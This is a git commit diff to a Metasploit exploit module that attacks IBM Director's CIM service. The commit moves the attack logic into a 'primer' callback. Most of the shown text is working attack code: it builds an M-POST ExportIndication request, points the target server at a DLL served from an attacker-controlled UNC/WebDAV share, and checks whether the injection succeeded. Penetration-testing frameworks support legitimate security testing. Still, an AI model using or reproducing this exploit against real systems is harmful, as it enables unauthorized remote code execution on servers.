using the primer callback as pointed by egypt

2012-12-06 18:59:46 +01:00 · 2012-12-06 18:59:46 +01:00 · fd20998f40
parent 8e21d9e235
commit fd20998f40
1 changed files with 20 additions and 13 deletions
--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@ -274,17 +274,21 @@ class Metasploit3 < Msf::Exploit::Remote

 	def exploit

-		basename = rand_text_alpha(3)
-		share_name = rand_text_alpha(3)
-
-		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-
-		exploit_unc  = "\\\\#{myhost}\\"
-
 		if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
 			fail_with(Exploit::Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')
 		end

+		super
+
+	end
+
+	def primer
+
+		basename = rand_text_alpha(3)
+		share_name = rand_text_alpha(3)
+		myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+		exploit_unc  = "\\\\#{myhost}\\"
+
 		vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")

 		@peer = "#{rhost}:#{rport}"
@ -296,16 +300,19 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method'       => 'M-POST',
 			'ctype'        => 'application/xml; charset=utf-8',
 			'headers'	   => {
-				"Man"     => "http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40",
-				"CIMOperation" => "MethodCall",
-				"CIMExport" => "MethodRequest",
+				"Man"             => "http://www.dmtf.org/cim/mapping/http/v1.0 ; ns=40",
+				"CIMOperation"    => "MethodCall",
+				"CIMExport"       => "MethodRequest",
 				"CIMExportMethod" => "ExportIndication"
 			},
 			'data'         => xml_data,
-		}, 1)
-
-		super
+		})

+		if res and res.code == 200 and res.body =~ /CIMVERSION/
+			print_status"#{@peer} - Then injection seemed to work..."
+		else
+			fail_with(Exploit::Failure::Unknown, "#{@peer} - Unexpected response")
+		end
 	end

 end